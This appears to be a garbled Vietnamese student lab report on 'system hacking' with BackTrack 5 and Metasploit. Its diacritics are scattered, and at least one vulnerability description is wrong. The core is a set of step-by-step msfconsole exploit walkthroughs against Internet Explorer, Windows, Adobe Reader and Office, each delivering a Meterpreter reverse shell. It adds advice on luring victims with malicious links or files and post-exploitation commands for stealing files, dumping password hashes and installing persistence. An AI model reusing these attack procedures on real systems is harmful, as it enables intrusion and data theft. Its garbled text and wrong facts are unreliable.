Snapshot m t máy o cho phép ta l u l i tr ng thái c a máy o t i th iộ ả ư ạ ạ ủ ả ạ ờ

đi m đó. Snapshot sẽ l u l i thông tin v c ng, Ram và các Setting trên máyể ư ạ ề ổ ứ

o. Sau khi l u snapshot, chúng ta có th quay tr l i tr ng thái c a máy o b tả ư ể ở ạ ạ ủ ả ấ

c lúc nào.ứ

Huỳnh Minh Trí Page 18

Page 20: System Hacking

System Hacking

VMware cho phép chúng ta l u nhi u snapshot c a máy o, vì th ng iư ề ủ ả ế ườ

dùng có th s d ng m t máy o vào nhi u ng c nh khác nhau, ti t ki m th iể ử ụ ộ ả ề ữ ả ế ệ ờ

gian cho vi c c u hình. Ch ng h n v i m t máy o A, trong m t bài lab ta mu nệ ấ ẳ ạ ớ ộ ả ộ ố

nó là m t máy ch Domain Controller, nh ng trong bài lab khác ta mu n x yộ ủ ư ố ấ

d ng nó thành m t máy ch ISA. Đ gi i quy t v n đ này, chúng ta có th l uự ộ ủ ể ả ế ấ ề ể ư

snapshot c a máy A t i th i đi m nó là domain controller, sau đó c u hình nóủ ạ ờ ể ấ

thành m t máy ch ISA và l u snapshot. Khi c n s d ng máy o A v i vai trò làộ ủ ư ầ ử ụ ả ớ

m t Domain Controller hay ISA, ta sẽ dùng trình qu n lý Snapshot Manager độ ả ể

chuy n t i tr ng thái mong mu n.ể ớ ạ ố

PH N 3: S D NG BACKTRACK Đ KHAI THÁC XÂMẦ Ử Ụ Ể NH P TRONG M NG LANẬ Ạ

1. H đi u hành Backtrack 5 R3ệ ề

Backtrack là m t b n phân ph i d ng Live DVD c a Linux, đ c phát tri nộ ả ố ạ ủ ượ ể

đ th nghi m xâm nh p. Backtrack là s h p nh t gi a 3 b n phân ph i khácể ử ệ ậ ự ợ ấ ữ ả ố

nhau c a Linux v thâm nh p th nghi m IWHAX, WHOPPIX, và Auditor. Trongủ ề ậ ử ệ

phiên b n hi n t i c a nó (5), Backtrack đ c d a trên phiên b n phân ph iả ệ ạ ủ ượ ự ả ố

Linux Ubuntu 11.10.

Công c Backtrack đã có l ch s phát tri n khá lâu qua nhi u b n linuxụ ị ử ể ề ả

khác nhau. Phiên b n hi n nay s d ng b n phân ph i Slackware linux (Tomasả ệ ử ụ ả ố

M.(www.slax.org)). Backtrack liên t c c p nh t các công c , drivers,... Hi n t iụ ậ ậ ụ ệ ạ

Backtrack có trên 300 công c ph c v cho vi c nghiên c u b o m t. Backtrackụ ụ ụ ệ ứ ả ậ

là s k t h p gi a 2 b công c ki m th b o m t r t n i ti ng là Whax vàự ế ợ ữ ộ ụ ể ử ả ậ ấ ổ ế

Auditor.

Backtrack 5 ch a m t s công c có th đ c s d ng trong quá trình thứ ộ ố ụ ể ượ ử ụ ử

nghi m thâm nh p c a chúng ta. Các công c ki m tra thâm nh p trongệ ậ ủ ụ ể ậ

Huỳnh Minh Trí Page 19

Page 21: System Hacking

System Hacking

Backtrack 5 có th đ c phân lo i nh sau:ể ượ ạ ư

– Information gathering: lo i này có ch a m t s công c có th đ c sạ ứ ộ ố ụ ể ượ ử

d ng đ có đ c thông tin liên quan đ n m t m c tiêu DNS, đ nh tuy n, đ a chụ ể ượ ế ộ ụ ị ế ị ỉ

e-mail, trang web, máy ch mail, và nh v y. Thông tin này đ c th u th p tủ ư ậ ượ ậ ừ

các thông tin có s n trên Internet, mà không c n ch m vào môi tr ng m c tiêu.ẵ ầ ạ ườ ụ

– Network mapping: lo i này ch a các công c có th đ c s d ng đạ ứ ụ ể ượ ử ụ ể

ki m tra các host đang t n t i, thông tin v OS, ng d ng đ c s d ng b iể ồ ạ ề ứ ụ ượ ử ụ ở

m c tiêu, và cũng làm portscanning. ụ

– Vulnerability identification: Trong th lo i này, chúng ta có th tìmể ạ ể

th y các công c đ quét các l h ng (t ng h p) và trong các thi t b Cisco. Nóấ ụ ể ỗ ổ ổ ợ ế ị

cũng ch a các công c đ th c hi n và phân tích Server Message Block (SMB) vàứ ụ ể ự ệ

Simple Network Management Protocol (SNMP).

– Web application analysis: lo i này ch a các công c có th đ c sạ ứ ụ ể ượ ử

d ng trong theo dõi, giám sát các ng d ng web.ụ ứ ụ

– Radio network analysis: Đ ki m tra m ng không dây, bluetooth vàể ể ạ

nh n d ng t n s vô tuy n (RFID), chúng ta có th s d ng các công c trongậ ạ ầ ố ế ể ử ụ ụ

th lo i này. ể ạ

– Penetration: lo i này ch a các công c có th đ c s d ng đ khaiạ ứ ụ ể ượ ử ụ ể

thác các l h ng tìm th y trong các máy tính m c tiêu. ỗ ổ ấ ụ

– Privilege escalation: Sau khi khai thác các l h ng và đ c truy c p vàoỗ ổ ượ ậ

các máy tính m c tiêu, chúng ta có th s d ng các công c trong lo i này đụ ể ử ụ ụ ạ ể

nâng cao đ c quy n c a chúng ta cho các đ c quy n cao nh t. ặ ề ủ ặ ề ấ

– Maintaining access: Công c trong lo i này sẽ có th giúp chúng taụ ạ ể

trong vi c duy trì quy n truy c p vào các máy tính m c tiêu. Chúng ta có thệ ề ậ ụ ể Huỳnh Minh Trí Page 20

Page 22: System Hacking

System Hacking

c n đ có đ c nh ng đ c quy n cao nh t tr c khi các chúng ta có th cài đ tầ ể ượ ữ ặ ề ấ ướ ể ặ

công c đ duy trì quy n truy c p. ụ ể ề ậ

– Voice Over IP (VOIP): Đ phân tích VOIP chúng ta có th s d ng cácể ể ử ụ

công c trong th lo i này. ụ ể ạ

– Digital forensics: Trong lo i này, chúng ta có th tìm th y m t s côngạ ể ấ ộ ố

c có th đ c s d ng đ làm phân tích kỹ thu t nh có đ c hình nh đĩaụ ể ượ ử ụ ể ậ ư ượ ả

c ng, c u trúc các t p tin, và phân tích hình nh đĩa c ng. Đ s d ng các côngứ ấ ậ ả ứ ể ử ụ

c cung c p trong th lo i này, chúng ta có th ch n Start Backtrack Forensicsụ ấ ể ạ ể ọ

trong trình đ n kh i đ ng. Đôi khi sẽ đòi h i chúng ta ph i g n k t n i b đĩaơ ở ộ ỏ ả ắ ế ộ ộ

c ng và các t p tin trao đ i trong ch đ ch đ c đ b o t n tính toàn v n. ứ ậ ổ ế ộ ỉ ọ ể ả ồ ẹ

– Reverse engineering: Th lo i này ch a các công c có th đ c sể ạ ứ ụ ể ượ ử

d ng đ g r i ch ng trình m t ho c tháo r i m t t p tin th c thi. ụ ể ỡ ố ươ ộ ặ ờ ộ ậ ự

2. Ph n m m Metasploitầ ề

Metasploit là m t d án b o m t máy tính cung c p các thông tin v v n đ lộ ự ả ậ ấ ề ấ ề ỗ

h ng b o m t cũng nh giúp đ v ki m tra thăm nh p và phát tri n h th ngổ ả ậ ư ỡ ề ể ậ ể ệ ố

phát hi n t n công m ng. Metasploit Framework là m t môi tr ng dùng đệ ấ ạ ộ ườ ể

ki m tra, t n công và khai thác l i c a các service. Metasploit đ c xây d ng tể ấ ỗ ủ ượ ự ừ

ngôn ng h ng đ i t ng Perl, v i nh ng components đ c vi t b ng C,ữ ướ ố ượ ớ ữ ượ ế ằ

assembler, và Python. Metasploit có th ch y trên h u h t các h đi u hành:ể ạ ầ ế ệ ề

Linux, Windows, MacOS. Chúng ta có th download ch ng trình t iể ươ ạ

www.metasploit.com

Metasploit h tr nhi u giao di n v i ng i dùng:ỗ ợ ề ệ ớ ườ

– Console interface: dùng l nh msfconsole. Msfconsole interface s d ngệ ử ụ

các dòng l nh đ c u hình, ki m tra nên nhanh h n và m m d o h n. ệ ể ấ ể ơ ề ẻ ơ

Huỳnh Minh Trí Page 21

Page 23: System Hacking

System Hacking

– Web interface: dùng msfweb, giao ti p v i ng i dùng thông qua giaoế ớ ườ

di n Web. ệ

– Command line interface: dùng msfcli.

Metasploit Enviroment:

– Global Enviroment: Đ c th c thi thông qua 2 câu l nh setg và unsetg,ượ ự ệ

nh ng options đ c gán đây sẽ mang tính toàn c c, đ c đ a vào t t c cácữ ượ ở ụ ượ ư ấ ả

module exploits.

– Temporary Enviroment: Đ c th c thi thông qua 2 câu l nh set vàượ ự ệ

unset, enviroment này ch đ c đ a vào module exploit đang load hi n t i,ỉ ượ ư ệ ạ

không nh h ng đ n các module exploit khác Chúng có th l u l i enviromentả ưở ế ể ư ạ

mình đã c u hình thông qua l nh save. Môi tr ng đó sẽ đ c l u trongấ ệ ườ ượ ư

./msf/config và sẽ đ c load tr l i khi user interface đ c th c hi n. ượ ở ạ ượ ự ệ

S d ng Metasploit Framework:ử ụ

2.1 Ch n module exploit: L a ch n ch ng trình, d ch v l i màọ ự ọ ươ ị ụ ỗ

Metasploit có h tr đ khai thácỗ ợ ể

Show exploits: xem các module exploit mà framework có h tr . ỗ ợ

Use exploit_name: ch n module exploit.ọ

Info exploit_name: xem thông tin v module exploit.ề

Chúng ta nên c p nh t th ng xuyên các l i d ch v cũng nh các moduleậ ậ ườ ỗ ị ụ ư

trên www.metasploit.com ho c qua l nh msfupdate ho cặ ệ ặ

svnupdat/opt/metasploit/msf3/

2.2 C u hình Module exploit đã ch n:ấ ọ

Huỳnh Minh Trí Page 22

Page 24: System Hacking

System Hacking

show options: Xác đ nh nh ng options nào c n c u hình. set: c u hình choị ữ ầ ấ ấ

nh ng option c a module đó.ữ ủ

M t vài module còn có nh ng advanced options, chúng ta có th xem b ngộ ữ ể ằ

cách gõ dòng l nh show advanceds.ệ

2.3 Verify nh ng options v a c u hình:ữ ừ ấ

check: ki m tra xem nh ng option đã đ c set chính xác ch a.ể ữ ượ ư

2.4 L a ch n target:ự ọ

show targets: nh ng target đ c cung c p b i module đó. set: xác đ nhữ ượ ấ ở ị

target nào.

2.5 L a ch n payload:ự ọ

show payloads: li t kê ra nh ng payload c a module exploit hi n t i. ệ ữ ủ ệ ạ

info payload_name: xem thông tin chi ti t v payload đó.ế ề

set payload payload_name: xác đ nh payload module name. Sau khi l aị ự

ch n payload nào, dùng l nh show options đ xem nh ng options c a payloadọ ệ ể ữ ủ

đó.

show advanced: xem nh ng advanced options c a payload đó.ữ ủ

2.6 Th c thi exploit:ự

exploit: l nh dùng đ th c thi payload code. Payload sau đó sẽệ ể ự

cung c p cho chúng ta nh ng thông tin v h th ng đ c khai thác.ấ ữ ề ệ ố ượ

3. S đ t ng quan h th ng m ng LANơ ồ ổ ệ ố ạ

Huỳnh Minh Trí Page 23

Page 25: System Hacking

System Hacking

S đ t ng quan h th ng m ng LANơ ồ ổ ệ ố ạ

Trong m t m ng LAN n i b , các máy tính th ng k t n i v i nhau v iộ ạ ộ ộ ườ ế ố ớ ớ

kho ng cách v t lý g n nh trong m t phòng, m t t ng, m t tòa nhà, công ty, …ả ậ ầ ư ộ ộ ầ ộ

Các máy tính trong m ng LAN có th chia s tài nguyên v i nhau, mà đi n hìnhạ ể ẻ ớ ể

là chia s t p tin, máy in, máy quét và m t s thi t b khác. Khi m t máy tính ẻ ậ ộ ố ế ị ộ ở

trong m ng LAN, nó có th s d ng các ch ng trình, ph n m m quét h th ngạ ể ử ụ ươ ầ ề ệ ố

m ng đ bi t đ c đ a ch IP các host có trong m ng.ạ ể ế ượ ị ỉ ạ

Nmap (Network Mapper) là m t ti n ích ngu n m mi n phí cho phátộ ệ ồ ở ễ

hi n m ng và ki m toán an ninh. Nmap và Zenmap (Công c h tr đ h a c aệ ạ ể ụ ỗ ợ ồ ọ ủ

nmap) đ c cài đ t s n trong BackTrack, s d ng các gói tin IP giúp xác đ nhượ ặ ẵ ử ụ ị

host nào có s n trên m ng, các d ch v (tên ng d ng và phiên b n) mà host đóẵ ạ ị ụ ứ ụ ả

đang cung c p, h đi u hành gì (và các phiên b n h đi u hành) mà h đangấ ệ ề ả ệ ề ọ

Huỳnh Minh Trí Page 24

Page 26: System Hacking

System Hacking

ch y, lo i b l c gói tin ho c t ng l a nào đang s d ng, và nhi u đ c đi mạ ạ ộ ọ ặ ườ ử ử ụ ề ặ ể

khác. Nmap ch y đ c trên t t c các h đi u hành, và các gói nh phân chínhạ ượ ấ ả ệ ề ị

th c có s n cho Linux, Windows, và Mac OSX.ứ ẵ

Sau khi xác đ nh đ c các host có trong m ng, ta có th s d ng các côngị ượ ạ ể ử ụ

c quét l i h th ng đ xác đ nh l h ng c a h th ng mu n xâm nh p, t đóụ ỗ ệ ố ể ị ỗ ổ ủ ệ ố ố ậ ừ

khai thác truy c p vào h th ng. M t trong s các công c quét l i này làậ ệ ố ộ ố ụ ỗ

Nessus.

M t khi đã xâm nh p thành công và chi m đ c toàn quy n đi u khi nộ ậ ế ượ ề ề ể

h th ng, Hacker có th th c hi n m i vi c trên máy n n nhân nhệ ố ể ự ệ ọ ệ ạ ư

down/upload files, thay đ i c u trúc h th ng, th c thi ch ng trình, đánh c pổ ấ ệ ố ự ươ ắ

m t kh u, cài trojan/ backdoor …ậ ẩ

4. Xâm nh p và khai thác Windows XPậ

Hacker:

– H đi u hành Back Track 5 ệ ề

– Đ a ch IP: 10.10.10.2 ị ỉ

4.1 Khai thác l h ng Ms10-090ổ ỏ

a) Mô t :ả

L i này n m trong c ch th c hi n mã hóa phiên làm vi c c a ng d ngỗ ằ ơ ế ự ệ ệ ủ ứ ụ

web ASP.NET, d n t i vi c k t n công có th thăm dò đ tìm ra khóa gi i mãẫ ớ ệ ẻ ấ ể ể ả

trong m t th i gian ng n. Hi n t i ch a có b n vá chính th c cho l i này.ộ ờ ắ ệ ạ ư ả ứ ỗ

b) Ph n m m b nh h ng:ầ ề ị ả ưở

T t c các h đi u hành dùng các phiên b n IE6 , IE7 và IE8ấ ả ệ ề ả

Huỳnh Minh Trí Page 25

Page 27: System Hacking

System Hacking

c) Cách th hi n t n công:ự ệ ấ

Kh i đ ng msfconsole t c a s terminal c a BackTrack: ở ộ ử ử ổ ủ

> msfconsole

Khai báo l h ng s d ng và thi t đ t options:ỗ ổ ử ụ ế ặ

> search ms10_090

> use exploit/windows/browser/ms10_090_ie_css_clip

> show options

> set srvhost 10.10.10.2

> set lhost 0.0.0.0

> set PAYLOAD windows/meterpreter/reverse_tcp

> exploit

BackTrack sẽ t o ra m t link ch a mã đ c (http://10.10.10.2:80iT1b69v).ạ ộ ứ ộ

Ch c n n n nhân nh p chu t vào link trên thì BackTrack sẽ t d ng g i mã đ cỉ ầ ạ ấ ộ ự ộ ử ộ

sang máy n n nhân và sau đó có th xem thông tin, chi n quy n c a máy n nạ ể ế ề ủ ạ

nhân đó.

Ti n hành khai thác máy n n nhânế ạ

> sessions

>sessions –i 1

4.2 Khai thác l h ng Ms10-042 ổ ỏ

a) Mô t : ả

Huỳnh Minh Trí Page 26

Page 28: System Hacking

System Hacking

L h ng này có th cho phép th c thi mã t xa n u ng i dùng xem m tỗ ổ ể ự ừ ế ườ ộ

trang web thi t k đ c bi t b ng cách s d ng m t trình duy t web ho c nh pế ế ặ ệ ằ ử ụ ộ ệ ặ ấ

vào m t liên k t thi t k đ c bi t trong m t thông báo e-mail. ộ ế ế ế ặ ệ ộ

b) Ph n m m b nh h ng: ầ ề ị ả ưở

Windows XP Service Pack 2 and Windows XP Service Pack 3

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 2

Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003

with SP2 for Itanium-based Systems

c) Cách th c hi n t n công: ự ệ ấ

Kh i đ ng msfconsole t c a s terminal c a BackTrack: ở ộ ử ử ổ ủ

> msfconsole

Khai báo l h ng s d ng và thi t đ t options:ỗ ổ ử ụ ế ặ

> search ms10_042

> use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec

> show options

> set srvhost 10.10.10.2

> set lhost 0.0.0.0

> set PAYLOAD windows/meterpreter/reverse_tcp

> exploit

Huỳnh Minh Trí Page 27

Page 29: System Hacking

System Hacking

BackTrack sẽ t o ra m t link ch a mã đ c (http://10.10.10.2:80). Ch c nạ ộ ứ ộ ỉ ầ

n n nhân nh p chu t vào link trên thì BackTrack sẽ t d ng g i mã đ c sangạ ấ ộ ự ộ ử ộ

máy n n nhân và sau đó có th xem thông tin, chi n quy n c a máy n n nhânạ ể ế ề ủ ạ

đó.

Ti n hành khai thác máy n n nhânế ạ

> sessions

> sessions –i 1

4.3 Khai thác l h ng Ms12-004 ổ ỏ

a) Mô t : ả

Các l h ng có th cho phép th c thi mã t xa n u ng i dùng m m tỗ ổ ể ự ừ ế ườ ở ộ

t p tin ph ng ti n truy n thông thi t k đ c bi t. M t k t n công khai thácậ ươ ệ ề ế ế ặ ệ ộ ẻ ấ

thành công l h ng có th l y đ c quy n s d ng gi ng nh ng i dùng đ aỗ ổ ể ấ ượ ề ử ụ ố ư ườ ị

ph ng. Ng i dùng có tài kho n đ c c u hình đ có quy n s d ng ít h nươ ườ ả ượ ấ ể ề ử ụ ơ

trên h th ng có th đ c ít nh h ng h n so v i nh ng ng i dùng ho tệ ố ể ượ ả ưở ơ ớ ữ ườ ạ

đ ng v i ng i s d ng quy n hành chính… ộ ớ ườ ử ụ ề

b) Ph n m m b nh h ng: Windows XP Windows Server 2003ầ ề ị ả ưở

Windows Vista Windows Server 2008 Windows 7 Windows Server 2008 R2

c) Cách th c hi n t n công ự ệ ấ

Kh i đ ng msfconsole t c a s terminal c a BackTrack ở ộ ử ử ổ ủ

>msfconsole

Khai báo l h ng s d ng và thi t đ t options:ỗ ổ ử ụ ế ặ

> Search ms12_004

Huỳnh Minh Trí Page 28

Page 30: System Hacking

System Hacking

> use exploit/windows/browser/ms12_004_midi

> show options

> set srvhost 10.10.10.2

> set lhost 0.0.0.0

> set payload windows/meterpreter/reverse_tcp

>exploit

BackTrack sẽ t o ra m t link ch a mã đ c (http://10.10.10.2:80). Ch c nạ ộ ứ ộ ỉ ầ

n n nhân nh p chu t vào link trên thì BackTrack sẽ t d ng g i mã đ c sangạ ấ ộ ự ộ ử ộ

máy n n nhân và sau đó có th xem thông tin, chi n quy n c a máy n n nhânạ ể ế ề ủ ạ

đó.

Ti n hành khai thác máy n n nhânế ạ

> sessions

> sessions –i 1

4.4 Khai thác l h ng file PDF qua Adobe Reader 9.xổ ỏ

a) Mô t : ả

Nguyên t c khai thác l i đây khá đ n gi n, b n sẽ t o ra m t file mã đ cắ ỗ ở ơ ả ạ ạ ộ ộ

có đuôi .pdf và g i cho n n nhân, làm th nào đ n n nhân nh n đ c và mử ạ ế ể ạ ậ ượ ở

file có ch a mã đ c đó lên (các b n có th t o m t Webserver gi m o, d n nứ ộ ạ ể ạ ộ ả ạ ụ ạ

nhân t i file đó v ho c có th g i kèm theo mail, quăng lên các m ng xã h i,ả ề ặ ể ử ạ ộ

các n i t i file…) và máy n n nhân đang s d ng AdobeReader 9.x. máy n nơ ả ạ ử ụ ạ

nhân sẽ b “nhi m đ c”. ị ễ ộ

Huỳnh Minh Trí Page 29

Page 31: System Hacking

System Hacking

b) Ph n m m b nh h ng: ầ ề ị ả ưở

Adobe Reader 9.x ch y trên n n Windows XP SP3 ạ ề

c) Cách th c hi n t n công: ự ệ ấ

Đi u ki n: Victim ph i cài đ t ph n m n Adobe Reader 9.x ề ệ ả ặ ầ ề

Kh i đ ng msfconsole t c a s terminal c a BackTrack. ở ộ ử ử ổ ủ

>msfconsole

Khai báo l h ng s d ng và thi t đ t options:ỗ ổ ử ụ ế ặ

> Search nojs

> use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

> show options

> set filename test.pdf (đây là tên do mình t đ t v i cú pháp *.pdf) ự ặ ớ

> set payload windows/meterpreter/reverse_tcp

> set lhost 0.0.0.0

> set lport 5555

>exploit

Sau khi ti n hành xong các b c trên, backtrack sẽ t o 1 file pdf có ch a mãế ướ ạ ứ

đ c, file sẽ đ c l u t i root./msf4/test.pdfộ ượ ư ạ

Ti p t c th c hi n các b c sau:ế ụ ự ệ ướ

> use multi/handler

Huỳnh Minh Trí Page 30

Page 32: System Hacking

System Hacking

> set payload windows/meterpreter/reverse_tcp

> set lhost 0.0.0.0

> set lport 5555

> exploit

T i đây chúng ta b t đ u g i file pdf v a t o cho máy n n nhân, khi n nớ ắ ầ ử ừ ạ ạ ạ

nhân m file backtrack sẽ g i mã đ c và chi m đ c quy n s d ng máy n nở ử ộ ế ượ ề ử ụ ạ

nhân.

4.5 Khai thác l h ng Ms12-027 ỗ ỏ

a) Mô t :ả

Nguyên t c khai thác l i đây khá đ n gi n, b n sẽ t o ra m t file mã đ cắ ỗ ở ơ ả ạ ạ ộ ộ

có đuôi .doc và g i cho n n nhân, làm th nào đ n n nhân nh n đ c và mử ạ ế ể ạ ậ ượ ở

file có ch a mã đ c đó lên (các b n có th t o m t web server gi m o, d n nứ ộ ạ ể ạ ộ ả ạ ụ ạ

nhân t i file đó v ho c có th g i kèm theo mail, …)ả ề ặ ể ử

b) Ph n m m b nh h ng: Microsoft Office 2003 Microsoft Office 2007ầ ề ị ả ưở

Microsoft Office 2010 (ngo i tr phiên b n x64-based editions) Microsoft ạ ừ ả

SQL Server 2000 Analysis Services

Microsoft SQL Server 2000 (ngo i tr phiên b n Itanium-based editions)ạ ừ ả

Microsoft SQL Server 2005 (đ i v i Microsoft SQL Server 2005 Express ố ớ

Edition ch th c hi n đ c trên Advanced Services)ỉ ự ệ ượ

Microsoft SQL Server 2008 Microsoft SQL Server 2008 R2 Microsoft

BizTalk Server 2002 Microsoft Commerce Server 2002 Microsoft Commerce

Server 2007 Microsoft Commerce Server 2009 Microsoft Commerce Server 2009

Huỳnh Minh Trí Page 31

Page 33: System Hacking

System Hacking

R2 Microsoft Visual FoxPro 8.0 Microsoft Visual FoxPro 9.0 Visual Basic 6.0

Runtime…

c) Cách th c hi n t n công:ự ệ ấ

Đi u ki n: Victim ph i cài đ t ph n m m Microsoft Office Word 2007ề ệ ả ặ ầ ề

Kh i đ ng msfconsole t c a s terminal c a BackTrack.ở ộ ử ử ổ ủ

> msfconsole

Khai báo l h ng s d ng và thi t đ t options:ỗ ổ ử ụ ế ặ

> search ms12_027

> use exploit/windows/fileformat/ms12_027_mscomctl_bof

> show options

> set filename test.doc (đây là tên do mình t đ t v i cú pháp *.pdf) ự ặ ớ

> set payload windows/meterpreter/reverse_tcp

> set lhost 0.0.0.0

> set lport 5555

> exploit

Sau khi ti n hành xong các b c trên, backtrack sẽ t o 1 file word có ch aế ướ ạ ứ

mã đ c, file sẽ đ c l u t i root./msf4/test.docộ ượ ư ạ

Ti p t c th c hi n các b c sau:ế ụ ự ệ ướ

> use exploit/multi/handler

>set payload /windows/meterpreter/reverse_tcp

Huỳnh Minh Trí Page 32

Page 34: System Hacking

System Hacking

> set lhost 0.0.0.0

> exploit

Sau khi th c hi n các b c trên, chúng ta b t đ u g i file word qua choự ệ ướ ắ ầ ử

máy n n nhân, khi n n nhân m file word backtrack sẽ t đ ng g i mã đ c quaạ ạ ở ự ộ ử ộ

và chúng ta có th chi m quy n s d ng máy n n nhânể ế ề ử ụ ạ

4.6 Khai thác thông tin sau khi đã t n công:ấ

Xem thông tin h th ng:ệ ố

> getuid

> sysinfo

T i lên và đánh c p tài li uả ắ ệ

– T i file abc.txt t i Desktop c a Back Track lên C c a XP ả ạ ủ ổ ủ

> upload /root/Desktop/abc.txt C:/

– Đánh c p file xyz.txt t i C c a XP và đem v Desktop c a Back Trackắ ạ ổ ủ ề ủ

> download C:/xyz.txt /root/Desktop

L y hashpass:ấ

> haskdump

Khám phá đĩa: ổ

meterpreter> shell

– Chuy n d u nh c sang đĩa C: ể ấ ắ ổ

> cd c:\

Huỳnh Minh Trí Page 33

Page 35: System Hacking

System Hacking

– Li t kê tài nguyên trong C: ệ ổ

> dir

– T o th m c abc trong C: ạ ư ụ ổ

> md abc

– Xóa th m c abc trong C: ư ụ ổ

> rd abc

– Xóa file abc.txt trong C: ổ

> del abc.txt

– Tr v meterpreter:ở ề

> exit

Gi k t n i v i Victim khi Victim m t m ng hay kh i đ ng l i t i portữ ế ố ớ ấ ạ ở ộ ạ ạ

5555

> run persistence -A -S -U -X -i 1500 -P 5555

Huỳnh Minh Trí Page 34

Page 36: System Hacking

System Hacking

PH N 4 : GNS3 VÀ MÔ PH NG H TH NG Đ NGẦ Ỏ Ệ Ố ƯỜ

M NG INTERNETẠ

1. GNS3 là gì?

GNS3 là 1 ch ng trình gi l p m ng có giao di n đ h a cho phép b n cóươ ả ậ ạ ệ ồ ọ ạ

th gi l p các lo i router Cisco s d ng IOS (h đi u hành c a router)ể ả ậ ạ ử ụ ệ ề ủ  th t,ậ

ngoài ra còn có th gi l p các thi t b m ng khác nh ATM, Frame Relay,ể ả ậ ế ị ạ ư

Ethernet Switch, Pix Firewall… và đ t bi t có th k t n i vào h th ng m ngặ ệ ể ế ố ệ ố ạ

th t và s d ng nh thi t b th t.ậ ử ụ ư ế ị ậ

GNS3 đ c phát tri n d a trên Dynamips và Dynagen đ mô ph ng cácượ ể ự ể ỏ

dòng router 1700, 2600, 3600, 3700, 7200 có th s đ tri n khai các bài labể ử ể ể

c a CCNA,CCNP,CCIE nh ng hi n t i v n ch a mô ph ng Catalyst Switch.ủ ư ệ ạ ẫ ư ỏ

Ngoài ra, GNS3 còn có ch c năng liên k t máy o v i VMWare và k t n iứ ế ả ớ ế ố

Internet đ th c hi n mô ph ng các s đ m ng th c t .ể ự ệ ỏ ơ ồ ạ ự ế

2.Mô ph ng m ng Internet đ t n công t máy Backtrack t i máyỏ ạ ể ấ ừ ớ

XP:

Mô hình m ng mô ph ng:ạ ỏ

Nhà Hacker: máy Backtrack n i v i R1: 10.10.10.0/30ố ớ

Nhà Victim: máy win XP n i v i R2: 10.10.10.12/30ố ớ

Huỳnh Minh Trí Page 35

Page 37: System Hacking

System Hacking

M ng Internet: router ISP n i v i R1: 10.10.10.4/30, R2: 10.10.10.8/30 vàạ ố ớ k t n i ra Internet: 203.164.4.2/24ế ố

C u hình:ấ

R1: conf t

int fa 0/0

ip add 10.10.10.1 255.255.255.252

ip nat inside

int s 0/0

ip add 10.10.10.5 255.255.255.252

ip nat outside

exit

access-list 1 permit 10.10.10.0 0.0.0.3

ip nat inside source list 1 int s 0/0 overload

ip nat inside source static tcp 10.10.10.2 3389 10.10.10.5 3389

Huỳnh Minh Trí Page 36

Page 38: System Hacking

System Hacking

ip nat inside source static tcp 10.10.10.2 4444 10.10.10.5 4444

ip nat inside source static tcp 10.10.10.2 5555 10.10.10.5 5555

ip nat inside source static tcp 10.10.10.2 80 10.10.10.5 80

ip nat inside source static tcp 10.10.10.2 8080 10.10.10.5 8080

router ei 1

no auto

network 10.0.0.0

passive-interface fa 0/0

router eigrp 1

network 10.10.10.4 0.0.0.3

no auto-summary

R2: conf t

int fa 0/0

ip add 10.10.10.13 255.255.255.252

ip nat inside

int s 0/1

ip add 10.10.10.10 255.255.255.252

ip nat outside

exit

access-list 1 permit 10.10.10.12 0.0.0.3

ip nat inside source list 1 int s 0/1 overload

router ei 1

no auto

Huỳnh Minh Trí Page 37

Page 39: System Hacking

System Hacking

network 10.10.10.12 0.0.0.3

network 10.10.10.8 0.0.0.3

ISP: conf t

int s 0/0

ip add 10.10.10.6 255.255.255.252

int s 0/1

ip add 10.10.10.9 255.255.255.252

int f 0/0

ip add 203.162.4.2 255.255.255.252

router eigrp 1

no auto

network 10.10.10.8 0.0.0.3

network 10.10.10.12 0.0.0.3

ip route 203.162.4.0 255.255.255.0 203.162.4.1

ip route 0.0.0.0 0.0.0.0 203.162.4.1

Sau khi c u hình xong máy Backtrack và XP có th ping đ c ra Internetấ ể ượ nh ng không th ping đ c l n nhau.ư ể ượ ẫ

V i mô hình này chúng ta có th xem nh đây là 2 đ ng m ng riêng bi tớ ể ư ườ ạ ệ không bi t đ a ch c a nhau nh đ ng m ng Internet th c t .ế ị ỉ ủ ư ườ ạ ự ế

Ta ti p t c th c hi n t n công t máy Backtrack t i máy win XP.ế ụ ự ệ ấ ừ ớ

Huỳnh Minh Trí Page 38

Page 40: System Hacking

System Hacking

PH N 5: T NG K TẦ Ổ Ế

V i nh ng ki u t n công h th ng d a trên nh ng l i sai sót trong quáớ ữ ể ấ ệ ố ự ữ ỗ

trình s d ng máy tính ho c các l i v b o m t v t lý, có m t s ph ng phápử ụ ặ ỗ ề ả ậ ậ ộ ố ươ

nh m gi m thi u và phòng tránh vi c Hacker đánh c p M t kh u nh sau:ằ ả ể ệ ắ ậ ẩ ư

– M t kh u ph i đ c đ t nhi u h n 8 ký t và ph i là t ng h p gi aậ ẩ ả ượ ặ ề ơ ự ả ổ ợ ữ

ch hoa, ch th ng, s và ký t đ c bi t đ các ch ng trình khó dò ra. ữ ữ ườ ố ự ặ ệ ể ươ

– C u hình trong registry cho m t kh u trong h th ng windows chấ ậ ẩ ệ ố ỉ

đ c băm và l u d i d ng NTLM đ các ch ng trình khó khăn đ dò tìm ượ ư ướ ạ ể ươ ể

– Ng i dùng admin nên xóa t p tin sam trong th m c Windows/repairườ ậ ư ụ

sau m i l n backup d li u b ng rdisk. ỗ ầ ữ ệ ằ

Trong quá trình s d ng máy tính đ truy c p Internet, c n l u ý: ử ụ ể ậ ầ ư

– Không m t p tin đính kèm th đi n t có ngu n g c không rõ ràngở ậ ư ệ ử ồ ố

ho c không tin c y. ặ ậ

– Ch c ch n r ng b n có và đã b t h th ng t ng l a cho h th ng c aắ ắ ằ ạ ậ ệ ố ườ ử ệ ố ủ

mình.

– Đ m b o Windows c a b n đ c c p nh t th ng xuyên, ph n m mả ả ủ ạ ượ ậ ậ ườ ầ ề

b o m t c a b n có ch c năng c p nh t "live" (t đ ng c p nh t tr c tuy n). ả ậ ủ ạ ứ ậ ậ ự ộ ậ ậ ự ế

– Cài đ t ph n m m di t virut Internet Security. ặ ầ ề ệ

– Luôn s d ng các b n Office có b n quy n đ luôn đ c c p nh t váử ụ ả ả ề ể ượ ậ ậ

l i và h tr kỹ thu t t nhà cung c p. ỗ ỗ ợ ậ ừ ấ

